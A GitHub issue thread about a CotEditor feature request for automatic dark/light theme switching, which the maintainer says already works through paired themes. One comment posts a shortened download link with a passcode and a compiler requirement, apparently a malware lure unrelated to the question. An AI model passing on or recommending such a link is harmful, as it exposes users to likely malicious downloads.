### ISSUE TITLE
Enable automatically switching between dark and light theme 

### ISSUE THREAD

**Issue by dhruvkb** [coteditor/CotEditor#1697]
### Current issue

The editor's UI theme can be set to match the system which is very nice. However the editor background and text theme cannot be set to match the system.

### The solution you'd like

It would be nice if we could pick a theme for dark and light and automatically switch between them based on the OS theme. A good example would be what iTerm2 has done.

### CotEditor version

4.8.7 (657)

### macOS version

14.6.1 (23G93)

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by 1024jp** [comment]
It's already implemented. If you select one of the paired themes, it switches automatically according to the state of the Dark mode. 
<img width="596" alt="Screenshot 2024-09-05 at 23 40 51" src="https://github.com/user-attachments/assets/2eb77671-9fab-4fd0-b8ea-de677dc98a4e">
